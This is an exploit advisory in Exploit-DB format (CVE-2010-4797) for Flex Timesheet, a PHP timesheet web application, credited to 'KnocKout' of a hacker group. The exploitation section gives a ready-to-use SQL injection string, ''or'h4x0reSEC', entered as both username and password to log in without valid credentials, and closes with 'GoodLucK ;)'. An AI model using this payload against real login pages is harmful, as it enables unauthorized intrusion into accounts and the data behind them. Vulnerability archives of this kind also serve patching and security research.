Flex Timesheet - Authentication Bypass

Author: KnocKout
type: webapps
platform: php
port: 
date_added: 2010-10-08 
date_updated: 2010-10-08 
verified: 1 
codes: OSVDB-68606;CVE-2010-4797 
tags: 
aliases:  
screenshot_url:  
application_url: 

===================================================
Flex Timesheet - Authentication Bypass() Vulnerability
===================================================
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockoutr@msn.com
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
           { H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Flex Timesheet
~Software: http://truworthit.com/ - Price:200$
~Vulnerability Style : Authentication Bypass()
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ~~~~~~~~ Explotation ~~~~~~~~~~~

    bypass foR Sql-i Code()
    ================================
    Username : 'or'h4x0reSEC
    Password : 'or'h4x0reSEC
    ================================
          [+]  Logged on.



      GoodLucK ;)


# Inj3ct0r.com [2010-09-28]